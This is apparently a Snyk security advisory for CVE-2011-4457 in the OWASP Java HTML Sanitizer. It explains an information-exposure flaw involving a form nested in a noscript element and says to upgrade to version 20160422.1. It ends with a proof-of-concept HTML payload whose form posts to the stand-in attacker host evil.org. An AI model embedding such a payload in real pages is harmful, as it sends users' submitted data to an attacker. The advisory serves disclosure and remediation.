Information Exposure Affecting com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer package, versions [,20160422.1)


Severity

Recommended
0.0
low
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.22% (45th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Information Exposure vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-COMGOOGLECODEOWASPJAVAHTMLSANITIZER-6182919
  • published21 Jan 2024
  • disclosed17 May 2022
  • creditUnknown

Introduced: 17 May 2022

CVE-2011-4457  (opens in a new tab)
CWE-200  (opens in a new tab)

How to fix?

Upgrade com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer to version 20160422.1 or higher.

Overview

Affected versions of this package are vulnerable to Information Exposure via a crafted FORM element within a NOSCRIPT element. An attacker can obtain potentially sensitive information by convincing a user to submit the form when JavaScript is disabled.

Note:

Due to the constrained circumstances and the fact that it does not allow the exfiltration of data protected by the same-origin policy, it is considered low risk. For policies that allow external links, the privilege escalation only includes POSTing, possibly including the upload of files chosen by the user.

PoC

<noscript>
  <form method=POST action=http://evil.org/>
    <input name=x value=y>
    <input type=submit>
  </form>
</noscript>

CVSS Base Scores

version 3.1